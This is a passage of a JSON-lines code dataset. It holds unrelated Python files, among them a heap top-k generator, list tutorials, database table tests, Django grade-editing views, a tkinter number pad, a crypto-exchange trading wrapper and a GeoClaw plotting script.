left_idx + 1\n while left_idx < len(data):\n child_idx = left_idx\n if rigth_idx < len(data) and data[rigth_idx] > data[left_idx]: # 存在右子节点 并且 右子节点大于左子节点\n child_idx = rigth_idx\n if data[idx] < data[child_idx]:\n data[idx], data[child_idx] = data[child_idx], data[idx]\n idx = child_idx\n left_idx = 2 * idx + 1\n rigth_idx = left_idx + 1\n else:\n break\n return ret\n\n return add, pop\n\ndef top_k3(k, time=3):\n start = datetime.datetime.now()\n add, pop = heap()\n ds = data_source()\n while True:\n add(next(ds))\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n ret = []\n for _ in range(k):\n ret.append(pop())\n yield ret\n\nif __name__ == \"__main__\":\n g = top_k3(10)\n for _ in range(3):\n print(next(g))","sub_path":"Find Max Number in Random.py","file_name":"Find Max Number in Random.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160878856","text":"\n\n# The simplest way to concatenate list1 and list2:\n# merged = list1 + list2\n\n\n# zip returns a list of tuples, where the i-th tuple contains the i-th element from each of the argument\n# sequences or iterables:\nimport itertools\nalist = ['a1', 'a2', 'a3']\nblist = ['b1', 'b2', 'b3']\nfor a, b in zip(alist, blist):\n print(a, b)\n# Output:\n# a1 b1\n# a2 b2\n# a3 b3\n\nprint(\"---\")\n# If the lists have different lengths then the result will include only as many elements as the shortest one:\nalist = ['a1', 'a2', 'a3']\nblist = ['b1', 'b2', 'b3', 'b4']\nfor a, b in zip(alist, blist):\n print(a, b)\n# Output:\n# a1 b1\n# a2 b2\n# a3 b3\nalist = 
[]\nlen(list(zip(alist, blist)))\n# Output:\n# 0\n\nprint(\"---\")\n# For padding lists of unequal length to the longest one with Nones use itertools.zip_longest\n# (itertools.izip_longest in Python 2)\nalist = ['a1', 'a2', 'a3']\nblist = ['b1']\nclist = ['c1', 'c2', 'c3', 'c4']\nfor a, b, c in itertools.zip_longest(alist, blist, clist):\n print(a, b, c)\n# Output:\n# a1 b1 c1\n# a2 None c2\n# a3 None c3\n# None None c4\n\n\n# Insert to a specific index values:\nalist = [123, 'xyz', 'zara', 'abc']\nalist.insert(3, [2009])\nprint(\"Final List :\", alist)\n# Output:\n# Final List: [123, 'xyz', 'zara', 2009, 'abc']\n","sub_path":"Chapter 20 List/20_8_Concatenate_and_Merge_lists.py","file_name":"20_8_Concatenate_and_Merge_lists.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116744589","text":"import random\n\nfrom tests.utils import async_test\nfrom donphan import Column, Table, SQLType\nfrom unittest import TestCase\n\n\nNUM_ITEMS = random.randint(3, 10)\n\n\nclass _TestTable(Table):\n a: Column[SQLType.Integer] = Column(primary_key=True)\n\n\nclass ViewTest(TestCase):\n def test_query_create(self):\n self.assertEqual(\n _TestTable._query_create(True),\n \"CREATE TABLE IF NOT EXISTS public.__test_table ( a INTEGER , PRIMARY KEY ( a ) )\",\n )\n\n def test_query_fetch_in(self):\n where = _TestTable._build_where_clause({\"a__in\": (1, 2, 3)})\n\n self.assertEqual(\n _TestTable._build_query_fetch(where, None, None),\n \"SELECT * FROM public.__test_table WHERE a = any($1::INTEGER[])\",\n )\n\n @async_test\n async def test_a_table_create(self):\n await _TestTable.create(None)\n\n @async_test\n async def test_b_table_insert(self):\n for x in range(NUM_ITEMS):\n await _TestTable.insert(None, a=x)\n\n @async_test\n async def test_c_table_fetch(self):\n records = list(await _TestTable.fetch(None))\n self.assertEqual(len(records), NUM_ITEMS)\n\n @async_test\n async def test_d_table_insert_returning(self):\n record = await _TestTable.insert(None, a=10, returning=\"*\")\n self.assertEqual(record[\"a\"], 10)\n\n record = await _TestTable.insert(None, a=11, returning=[\"a\"])\n self.assertEqual(record[\"a\"], 11)\n\n record = await _TestTable.insert(None, a=12, returning=[_TestTable.a])\n self.assertEqual(record[\"a\"], 12)\n\n @async_test\n async def test_e_table_fetch_in(self):\n records = await _TestTable.fetch(None, a__in=(10, 11, 12, 13))\n self.assertEqual(len(list(records)), 3)\n\n @async_test\n async def test_f_table_delete(self):\n await _TestTable.drop(None)\n","sub_path":"tests/test_d_table.py","file_name":"test_d_table.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258259991","text":"@classmethod\ndef _string_to_dict(cls, string):\n # string = 'document.cpf IS not_empty AND more_than:50 OR less_than:45 OR between:60,65'\n string = string.split('IS')\n field = string[0].strip()\n\n def extract_condition_or(condition):\n condition = condition.split('OR')\n return list(map(lambda c: c.strip(), condition))\n\n def extract_condition_and(condition):\n condition = condition.split('AND')\n return list(map(lambda c: extract_args(c), condition))\n\n def extract_args(condition):\n condition = condition.split(':')\n\n field = condition[0].strip()\n args = condition[1].split(',') if len(condition) == 2 else []\n args = list(map(lambda c: c.strip(), args))\n return {\"{}\".format(field): args}\n\n condition 
= extract_condition_or(string[1])\n    condition = list(map(lambda c: extract_condition_and(c), condition))\n\n    # build one {test_name: args} dict per AND-group; this helper was dedented\n    # to module level in the original, which left the final return unreachable\n    def condition_to_dict(condition):\n        result = {}\n        for c in condition:\n            key = next(iter(c.keys()))\n            result[key] = c[key]\n        return result\n\n    return list(map(lambda c: condition_to_dict(c), condition))\n\n\ndef dict_value(obj, path):\n    # walk a dotted path such as 'document.cpf' through nested dicts\n    keys = path.split('.')\n    value = obj\n    try:\n        for key in keys:\n            value = value['{}'.format(key)]\n    except KeyError:\n        value = None\n    return value\n\ndef test(array):\n\n    def process_test(item):\n        for key in item.keys():\n            # my_obj, field and Classe are supplied by the surrounding recipe\n            value = dict_value(my_obj, field)\n            args = item[key]\n            status = getattr(Classe, '_test_{}'.format(key))(value, args)\n            print(key, value, args, status)\n            item[key] = status\n\n        item = list(map(lambda key: item[key], item.keys()))\n        return all(item)\n\n    array = list(map(lambda item: process_test(item), array))\n    return True in array\n","sub_path":"personal_codes_recipes/literal.py","file_name":"literal.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"158213332","text":"from selenium import webdriver\nimport os\n\nclass RunChromeTests():\n # http://chromedriver.storage.googleapis.com/index.html\n\n def test(self):\n driverLocation = \"/Users/urieow/Documents/Webdriver/chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = driverLocation\n # Instantiate Chrome Browser Command\n driver = webdriver.Chrome(driverLocation)\n # Open the provided URL\n driver.get(\"https://letskodeit.teachable.com/p/practice\")\n\nff = RunChromeTests()\nff.test()","sub_path":"RunChromeTests.py","file_name":"RunChromeTests.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"518048166","text":"#!/usr/bin/python\n#coding=utf-8\n\n\nfrom bs4 import BeautifulSoup\nfrom xml.etree.ElementTree import *\nimport xml.etree.ElementTree as et\n\nimport pygraphviz as pgv\n\ndef draw_directed_graph(xml_name):\n xml_soup = BeautifulSoup(open(xml_name) )\n \n dependencies_list = xml_soup('dependencies')\n count = 0\n directed_graph = pgv.AGraph(strict = False, directed = True)\n for dependencies in dependencies_list:\n count += 1\n tag = str(count)\n if dependencies['type'] == 'collapsed-dependencies':\n for dep in dependencies('dep'):\n directed_graph.add_edge(tag + dep.governor.renderContents(), \\\n tag + dep.dependent.renderContents() )\n\n directed_graph.layout()\n directed_graph.draw('result_57.png')\n \n \n\n\n\nif __name__ == '__main__':\n\n xml_name = 'nlp.txt.xml'\n draw_directed_graph(xml_name)\n","sub_path":"kodaira/bs_6set/part57.py","file_name":"part57.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"548756272","text":"# opening reconstructed from the surviving tail of this record; the original\n# text was truncated here and fused with a fragment of an unrelated sample\ndef nlines(f,n):\n    with open(f, encoding=\"utf8\") as file:\n        print(\"FILE-->\",f)\n        print(\"\")\n        for line in (file.readlines()[-n:]):\n            print(line,end='')\nn=int(input(\"ENTER THE NO. 
OF LINES\"))\nname=\"textdemo.txt\"\nnlines(name,n)\n#except:\n # print(\"ERROR\")\nprint(\"\")\n\nwith open(\"textdemo.txt\", encoding=\"utf8\") as file:\n file.seek(0,0)\n wordstring=file.read()\n # \" \" or \".\" or ... always evaluates to \" \"; split() on whitespace instead\n wordlist=wordstring.split()\n# print each distinct word once instead of once per occurrence\nfor word in sorted(set(wordlist)):\n print(\"TOTAL \"+word+\"'s IN FILE-->%d\"%int(wordlist.count(word)))\n\nprint(\"\")\ntry:\n f1=open(\"textdemo.txt\", encoding=\"utf8\")\n f2=open(\"textdemo2.txt\",\"r+\")\n f2.writelines(wordstring)\n f1.close()\n f2.close()\n print(\"COPY OPERATION PERFORMED\")\nexcept Exception:\n print(\"ERROR\")\n\n\nf1 = open(\"name.txt\", \"r+\")\nf2 = open(\"name2.txt\", \"r+\")\nprint(\"COMBINED LINES-->\")\nfor line1, line2 in zip(f1,f2):\n print(line2+line1,end=\"\")\nf1.close()\nf2.close()\n\nprint(\"\")\nrandomlist=[]\nimport random\nfor i in range(0,10):\n randomlist.append(random.randrange(0,100))\n randomlist[i]=str(randomlist[i])\nprint(randomlist)\nprint(sorted(randomlist))\nf1=open(\"demo3.txt\",\"r+\")\nf1.writelines(randomlist)\nf1.seek(0)  # rewind before reading back what was just written\nprint(f1.readline())\nprint(\"read\")\nf1.close()\nf1=open(\"sortedfile.txt\",\"r+\")\nf1.writelines(sorted(randomlist))\nf1.seek(0)\nprint(f1.readline())","sub_path":"venv/a14.py","file_name":"a14.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"320641082","text":"# Create your views here.\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django import forms\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.utils.safestring import mark_safe\nfrom string import Template\nfrom raceresults.main.import_util import import_objects_from_excel\nfrom django import template\nfrom django.template import RequestContext\nfrom django.utils.safestring import SafeUnicode\nfrom django.contrib.auth.decorators import permission_required\n\n#import time, datetime\n# the class is needed (datetime.now() is called below), not the bare module\nfrom datetime import datetime\nimport re\n\n#import models\nfrom raceresults.main.models import *\nfrom raceresults.main.dbSearchFunctions import *\nfrom raceresults.main.import_util import *\n\nfrom raceresults.main.permissions import getPermissions, errorPage, checkPermissions\n\ndef gradesView(request, club, last_name=None):\n\tcontext = {}\n\tclubObject, error = getClubId(club)\n\tcontext['club'] = clubObject\n\tcontext['clubs'] = getClubs()\n\t\n\tif request.user.is_authenticated():\n\t\tuser = request.user\n\t\tcontext['user'] = user\n\t\tpermissions, hasPermission, superUser = getPermissions(user)\n\t\tif superUser:\n\t\t\tcontext['hasPermissions'] = 'True'\n\t\telse:\n\t\t\tif hasPermission:\n\t\t\t\tclubPermissions = permissions.get(clubObject.uniqueName, None)\n\t\t\t\tif clubPermissions:\n\t\t\t\t\tif clubPermissions.manager or clubPermissions.grader or clubPermissions.membership:\n\t\t\t\t\t\tcontext['hasPermissions'] = 'True'\n\t\t\n\tif last_name:\n\t\tif last_name == 'All':\n\t\t\tcontext['riders'] = getAllClubRiders(club)\n\t\telse:\n\t\t\tcontext['riders'] = getAllClubRiders(club,last_name)\n\treturn render_to_response(\"grades/grades.html\", context, context_instance=RequestContext(request))\n\t\t\ndef 
gradesPageView(request, club = -1, last_name=None):\n\tcontext={}\n\tif request.user.is_authenticated():\n\t\tuser = request.user\n\t\tcontext['user'] = user\n\telse:\n\t\treturn errorPage(request, context, ['Manager', 'or', 'Grader', 'or', 'Membership'])\n\t\n\tpermissions, hasPermission, superUser = getPermissions(user)\n\tif hasPermission:\n\t\tcontext['clubs'] = getClubs()\n\t\tif superUser:\n\t\t\tcontext['gradeClubs'] = getClubs()\n\t\t\tcontext['superUser'] = True\n\t\t\tcontext['permissions'] = None\n\t\t\tif club == -1:\n\t\t\t\tclubObject = context['clubs'][0]\n\t\t\telse:\n\t\t\t\tclubObject, flag = getClubId(club)\n\t\t\t\tif flag:\n\t\t\t\t\traise Http404()\t\n\t\t\tcontext['club'] = clubObject\n\t\telse:\n\t\t\tclubs = []\n\t\t\n\t\t\tfor key, value in permissions.iteritems(): # select clubs that user has permission to manage.\n\t\t\t\tif value.manager or value.grader or value.membership:\n\t\t\t\t\tclubs.append(value.club)\n\t\t\tcontext['gradeClubs'] = clubs\n\t\t\t\n\t\t\tif club == -1: # if no club selected, check if user have permissions for own club if not choose one of the clubs that they do\n\t\t\t\tclubPermissions = permissions.get(user.athlete.club.uniqueName, None)\n\t\t\t\tif clubPermissions:\n\t\t\t\t\tif clubPermissions.manager or clubPermissions.grader or clubPermissions.membership:\n\t\t\t\t\t\tclubObject = clubPermissions.club\n\t\t\t\t\telse: # don't have permission choose first of the list that they do.\n\t\t\t\t\t\tclubObject = clubs[0]\n\t\t\telse:\n\t\t\t\tclubObject, flag = getClubId(club)\n\t\t\t\tif flag:\n\t\t\t\t\traise Http404()\n\t\t\t\tif not checkPermissions(permissions, club = clubObject, superUser = True, manager = True, grader = True, membership = True):\n\t\t\t\t\tcontext['permissions'] = permissions\n\t\t\t\t\tcontext['club'] = clubObject.uniqueName\n\t\t\t\t\treturn errorPage(request, context, [ 'Manager or Membership or Grader'])\n\t\t\tcontext['permissions'] = permissions[clubObject.uniqueName]\n\t\t\t\t\t\t\t\t\t\t\t\n\t\tcontext['club'] = clubObject\n\t\tseasons, flag = getClubSeasons(clubObject)\n\t\tif not flag:\n\t\t\tcontext['seasons'] = seasons\n\t\t\t\t\n\t\tif last_name:\n\t\t\tif last_name == 'All':\n\t\t\t\tcontext['riders'] = getAllClubRiders(clubObject.id)\n\t\t\telse:\n\t\t\t\tcontext['riders'] = getAllClubRiders(clubObject.id,last_name)\n\t\tcontext['grades'] = getGrades()\n\t\treturn render_to_response('grades/edit/gradesPage.html', context, context_instance=RequestContext(request))\n\telse:\n\t\tcontext['permissions'] = permissions\n\t\treturn errorPage(request, context, ['Manager or Membership or Grader'])\n\ndef reviewGrades(request, club, last_name=None):\n\tcontext = {}\n\tuser = request.user\n\tcontext['user'] = user\n\t\n\tclubObject, error = getClubId(club)\n\tcontext['club'] = clubObject\n\tcontext['clubs'] = getClubs()\n\t\n\tpermissions, hasPermission, superUser = getPermissions(user)\n\tif hasPermission and (superUser or \n\t\tcheckPermissions(permissions, club = clubObject, superUser = True, manager = True, grader = True, membership = True)):\n\t\tif last_name:\n\t\t\tif not superUser:\n\t\t\t\tcontext['permissions'] = permissions[clubObject.uniqueName]\n\t\t\telse:\n\t\t\t\tcontext['superUser'] = True\n\t\t\tif last_name == 'All':\n\t\t\t\tcontext['riders'] = getAllClubRiders(club)\n\t\t\telse:\n\t\t\t\tcontext['riders'] = getAllClubRiders(club,last_name)\n\t\t\tcontext['grades'] = getGrades()\n\telse:\n\t\tcontext['permissions'] = permissions\n\t\treturn errorPage(request, context, ['Manager', 'or', 
'Grader', 'or', 'Membership'])\n\t\n\treturn render_to_response(\"grades/edit/editGrades.html\", context, context_instance=RequestContext(request))\n\n#ajax grade change function\t\ndef changeRiderGrades(request, rider):\n\tcontext = {}\n\tuser = request.user\n\tcontext['user'] = user\n\t\n\trider, error = getRider(rider)\n\tif not error and rider:\n\t\tpermissions, hasPermission, superUser = getPermissions(user)\n\t\tif hasPermission and (superUser or \n\t\t\tcheckPermissions(permissions, club = rider.club, superUser = True, grader = True, manager = True)):\n\t\t\tif request.method == 'POST':\n\t\t\t\tuser = request.user\n\t\t\t\tflag = True\n\t\t\t\terrorNo = 0\n\t\t\t\tgradeHistory = None\n\t\t\t\tsubGradeHistory = None\n\t\t\t\ttrackGradeHistory = None\n\t\t\t\tcriteriumGradeHistory = None\n\t\t\n\t\t\t\tgrade = request.POST.get('grade',None)\n\t\t\t\tif grade:\n\t\t\t\t\tgrade, error = getGrade(grade)\n\t\t\t\t\tif not error and not grade == rider.grade:\n\t\t\t\t\t\tif rider.grade:\n\t\t\t\t\t\t\tnote = 'Grade change:' + rider.grade.shortName + ' to ' + grade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Grade change to ' + grade.shortName + ' by ' + user.username\n\t\t\t\t\t\tgradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 1, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.grade = grade\n\t\t\t\t\n\t\t\t\tsubGrade = request.POST.get('subGrade',None)\n\t\t\t\tif subGrade:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsubGrade = int(subGrade)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tsubGrade = 1\n\t\t\t\t\tif not subGrade == rider.subGrade:\n\t\t\t\t\t\tsubGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = 'Sub grade change:' + str(rider.subGrade) + ' to ' + str(subGrade) + ' by ' + user.username,\n\t\t\t\t\t\t\tgradeType = 2, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.subGrade = subGrade\n\t\t\t\t\n\t\t\t\ttrackGrade = request.POST.get('trackGrade',None)\n\t\t\t\tif trackGrade:\n\t\t\t\t\ttrackGrade, error = getGrade(trackGrade)\n\t\t\t\t\tif not error and not trackGrade == rider.trackGrade:\n\t\t\t\t\t\tif rider.trackGrade:\n\t\t\t\t\t\t\tnote = 'Track grade change:' + rider.trackGrade.shortName + ' to ' + trackGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Track grade change to ' + trackGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\ttrackGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 3, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.trackGrade = trackGrade\n\t\t\t\t\n\t\t\t\tcriteriumGrade = request.POST.get('criteriumGrade',None)\n\t\t\t\tif criteriumGrade:\n\t\t\t\t\tcriteriumGrade, error = getGrade(criteriumGrade)\n\t\t\t\t\tif not error and not criteriumGrade == rider.criteriumGrade:\n\t\t\t\t\t\tif rider.criteriumGrade:\n\t\t\t\t\t\t\tnote = 'Criterium grade change:' + rider.criteriumGrade.shortName + ' to ' + criteriumGrade.shortName + ' by ' + user.username\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnote = 'Criterium grade change to ' + criteriumGrade.shortName + ' by ' + user.username\t\n\t\t\t\t\t\tcriteriumGradeHistory = AthleteGradeHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\tnote = note, gradeType = 4, date = datetime.now(), current = True)\n\t\t\t\t\t\trider.criteriumGrade = criteriumGrade\n\t\t\n\t\t\t\tif errorNo == 0:\n\t\t\t\t\tif criteriumGradeHistory:\n\t\t\t\t\t\tcriteriumGradeHistory.save()\n\t\t\t\t\tif 
trackGradeHistory:\n\t\t\t\t\t\ttrackGradeHistory.save()\n\t\t\t\t\tif subGradeHistory:\n\t\t\t\t\t\tsubGradeHistory.save()\n\t\t\t\t\tif gradeHistory:\n\t\t\t\t\t\tgradeHistory.save()\n\t\t\t\t\trider.save()\t\n\t\t\n\t\t\t\t\tclub = request.POST.get('club',None)\t\n\t\t\t\t\tif club:\n\t\t\t\t\t\tclub, error = getClubId(club)\n\t\t\t\t\t\tif not error and not club == rider.club and (superUser or \n\t\t\t\t\t\t\tcheckPermissions(permissions, club = clubObject, superUser = True, membership = True)):\n\t\t\t\t\t\t\tif rider.club:\n\t\t\t\t\t\t\t\tnote = 'Changed club from: ' + rider.club.uniqueName + ' to ' + club.uniqueName + ' by ' + user.username\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnote = 'Changed club to: ' + club.uniqueName + ' by ' + user.username\t\n\t\t\t\t\t\t\tclubHistory = AthleteClubHistory.objects.create(athlete = rider,\n\t\t\t\t\t\t\t\tnote = note, date = datetime.now(), current = True)\n\t\t\t\t\t\t\trider.club = club\n\t\t\t\t\t\t\trider.save()\n\t\t\t\t\t\t\tclubHistory.save()\n\t\t\t\t\t\t\t\n\t\t\t\t\treturn render_to_response(\"comps/AJAX/yesResult.xml\", {})\n\t\t\t\t\t\t\t\t\t\t\t\n\treturn render_to_response(\"comps/AJAX/noResult.xml\", {})\n\t","sub_path":"raceresults/main/gradeViews.py","file_name":"gradeViews.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565095548","text":"from tkinter import *\nfrom tkinter import simpledialog,Text\n\nclass NumPad(simpledialog.Dialog):\n def __init__(self,root=None,parent=None,masa=\"min\"):\n self.root=root\n self.masa = masa\n self.parent=parent\n self.top = Toplevel(master=parent.frame)\n self.top.title(masa)\n self.top.protocol(\"WM_DELETE_WINDOW\", self.OK)\n\n self.EntryFrame = Frame(self.top)\n self.BtnsFrame = Frame(self.top)\n self.createWidgets()\n self.top.wait_visibility()\n self.top.grab_set()\n\n def createWidgets(self):\n self.entry = Entry(self.EntryFrame,font=(\"Helvetica\",32),width=5,justify=CENTER)\n self.entry.pack(pady=10)\n btn_list = ['7', '8', '9', '4', '5', '6', '1', '2', '3', 'Del', '0', 'OK']\n # create and position all buttons with a for-loop\n # r, c used for row, column grid values\n r = 0\n c = 0\n n = 0\n # list(range()) needed for Python3\n btns = []\n for label in btn_list:\n # partial takes care of function and argument\n cmd = lambda x = label: self.click(x)\n btns.append(Button(self.BtnsFrame, text=label, width=10, height=5, command=cmd))\n btns[-1].grid(row=r, column=c)\n # increment button index\n n += 1\n # update row/column position\n c += 1\n if c == 3:\n c = 0\n r += 1\n self.EntryFrame.pack()\n self.BtnsFrame.pack()\n\n def click(self,label):\n if self.masa == \"min\":\n if label == 'Del':\n currentText = str(self.parent.masa_min.get())\n self.parent.masa_min.set(currentText[:-1])\n self.parent.entry_masa_min.delete(0, END)\n self.entry.delete(0,END)\n self.parent.entry_masa_min.insert(0, self.parent.masa_min.get())\n self.entry.insert(0,self.parent.masa_min.get())\n elif label == 'OK':\n self.OK()\n else:\n currentText = str(self.parent.masa_min.get())\n self.parent.entry_masa_min.delete(0,END)\n self.entry.delete(0, END)\n self.parent.masa_min.set(int(currentText+label))\n self.parent.entry_masa_min.insert(0, self.parent.masa_min.get())\n self.entry.insert(0,self.parent.masa_min.get())\n\n elif self.masa == \"max\":\n if label == 'Del':\n currentText = str(self.parent.masa_max.get())\n self.parent.masa_max.set(currentText[:-1])\n self.parent.entry_masa_max.delete(0, END)\n 
self.entry.delete(0, END)\n self.parent.entry_masa_max.insert(0, self.parent.masa_max.get())\n self.entry.insert(0, self.parent.masa_max.get())\n elif label == 'OK':\n self.OK()\n else:\n currentText = str(self.parent.masa_max.get())\n self.parent.entry_masa_max.delete(0,END)\n self.entry.delete(0, END)\n self.parent.masa_max.set(int(currentText+label))\n self.parent.entry_masa_max.insert(0, self.parent.masa_max.get())\n self.entry.insert(0, self.parent.masa_max.get())\n\n def OK(self):\n self.top.destroy()\n self.top.master.focus()","sub_path":"Raspberry_Pi/Raspberry_kod/raspi/NumPad.py","file_name":"NumPad.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"584998010","text":"#!/usr/bin/python\nimport argparse\nfrom binance.enums import KLINE_INTERVAL_1DAY\nfrom binance.rmt_srv import RmtSrvObj as BnbRmtSrvObj\nfrom okex.rmt_srv import RmtSrvObj as OkexRmtSrvObj\nfrom engine import Engine\n\nclass RealEngine(Engine):\n \"\"\"Engine backed by a live exchange connection\"\"\"\n def __init__(self, args):\n exchange = args.e\n target_coin = args.t\n base_coin = args.b\n\n if exchange == 'binance':\n self.target_coin = target_coin.upper()\n self.base_coin = base_coin.upper()\n pair = '%s%s' % (self.target_coin, self.base_coin)\n print(\"The pair is %s \" % pair)\n self.rmt_srv = BnbRmtSrvObj(pair, KLINE_INTERVAL_1DAY, 300, debug=True)\n elif exchange == 'okex':\n self.target_coin = target_coin.lower()\n self.base_coin = base_coin.lower()\n pair = '%s_%s' % (self.target_coin, self.base_coin)\n print(\"The pair is %s \" % pair)\n self.rmt_srv = OkexRmtSrvObj(pair, '1day', 7, debug=True)\n else:\n print('Wrong exchange name: %s' % exchange)\n exit(1)\n\n def get_kline(self):\n return self.rmt_srv.get_kline_pd()\n\n def get_balance(self):\n target_balance = {}\n base_balance = {}\n account = self.rmt_srv.get_account()\n for item in account:\n if self.base_coin == item['asset']:\n base_balance = {'free': item['free'], 'frozen': item['locked']}\n elif self.target_coin == item['asset']:\n target_balance = {'free': item['free'], 'frozen': item['locked']}\n if base_balance != {} and target_balance != {}:\n break\n return target_balance, base_balance\n\n def buy(self, price, amount):\n order_id = self.rmt_srv.buy(price, amount)\n return order_id\n\n def sell(self, price, amount):\n order_id = self.rmt_srv.sell(price, amount)\n return order_id\n\ndef test():\n # __init__ expects an argparse-style namespace with e/t/b attributes,\n # not separate keyword arguments\n args = argparse.Namespace(e='binance', t='btc', b='usdt')\n re = RealEngine(args)\n df = re.get_kline()\n print(df)\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"realengine.py","file_name":"realengine.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"341370948","text":"\n\"\"\" \nSet up the plot figures, axes, and items to be done for each frame.\n\nThis module is imported by the plotting routines and then the\nfunction setplot is called to set the plot parameters.\n \n\"\"\" \n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom clawpack.geoclaw import topotools\nfrom six.moves import range\n\ntry:\n TG32412 = np.loadtxt('32412_notide.txt')\nexcept:\n print(\"*** Could not load DART data file\")\n\n#--------------------------\ndef setplot(plotdata=None):\n#--------------------------\n \n \"\"\" \n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of 
pyclaw.plotters.data.ClawPlotData.\n Output: a modified version of plotdata.\n \n \"\"\" \n\n\n from clawpack.visclaw import colormaps, geoplot\n from numpy import linspace\n\n if plotdata is None:\n from clawpack.visclaw.data import ClawPlotData\n plotdata = ClawPlotData()\n\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n plotdata.format = 'ascii' # 'ascii', 'binary', 'netcdf'\n\n\n # To plot gauge locations on pcolor or contour plot, use this as\n # an afteraxis function:\n\n def addgauges(current_data):\n from clawpack.visclaw import gaugetools\n gaugetools.plot_gauge_locations(current_data.plotdata, \\\n gaugenos='all', format_string='ko', add_labels=True)\n \n\n # To add title with time format hours:minutes:seconds...\n\n def title_hours(current_data):\n from pylab import title, mod\n t = current_data.t\n hours = int(t/3600.)\n tmin = mod(t,3600.)\n min = int(tmin/60.)\n tsec = mod(tmin,60.)\n sec = int(mod(tmin,60.))\n timestr = '%s:%s:%s' % (hours,str(min).zfill(2),str(sec).zfill(2))\n title('%s after earthquake' % timestr)\n\n\n\n #-----------------------------------------\n # Figure for surface\n #-----------------------------------------\n plotfigure = plotdata.new_plotfigure(name='Surface', figno=0)\n plotfigure.kwargs = {'figsize':(12,6)}\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('pcolor')\n plotaxes.axescmd = 'subplot(121)'\n plotaxes.title = 'Surface'\n plotaxes.scaled = True\n\n def fixup(current_data):\n addgauges(current_data)\n title_hours(current_data)\n\n plotaxes.afteraxes = fixup\n\n # Water\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.surface_or_depth\n plotitem.pcolor_cmap = geoplot.tsunami_colormap\n plotitem.pcolor_cmin = -0.2\n plotitem.pcolor_cmax = 0.2\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 1\n\n # Land\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = geoplot.land\n plotitem.pcolor_cmap = geoplot.land_colors\n plotitem.pcolor_cmin = 0.0\n plotitem.pcolor_cmax = 100.0\n plotitem.add_colorbar = False\n plotitem.amr_celledges_show = [0,0,0]\n plotitem.patchedges_show = 0\n plotaxes.xlimits = [-120,-60]\n plotaxes.ylimits = [-60,0]\n\n # add contour lines of bathy if desired:\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.show = False\n plotitem.plot_var = geoplot.topo\n plotitem.contour_levels = linspace(-3000,-3000,1)\n plotitem.amr_contour_colors = ['y'] # color on each level\n plotitem.kwargs = {'linestyles':'solid','linewidths':2}\n plotitem.amr_contour_show = [1,0,0] \n plotitem.celledges_show = 0\n plotitem.patchedges_show = 0\n\n\n #-----------------------------------------\n # Figure for adjoint flagging\n #-----------------------------------------\n\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes('adjoint')\n plotaxes.axescmd = 'subplot(122)'\n plotaxes.scaled = True\n plotaxes.title = 'Adjoint flag'\n\n def fixup(current_data):\n addgauges(current_data)\n\n plotaxes.afteraxes = fixup\n\n\n def masked_inner_product(current_data):\n from numpy import ma\n aux = current_data.aux\n tol = 1e-15\n soln = ma.masked_where(aux[3,:,:] < tol, aux[3,:,:])\n return soln\n\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 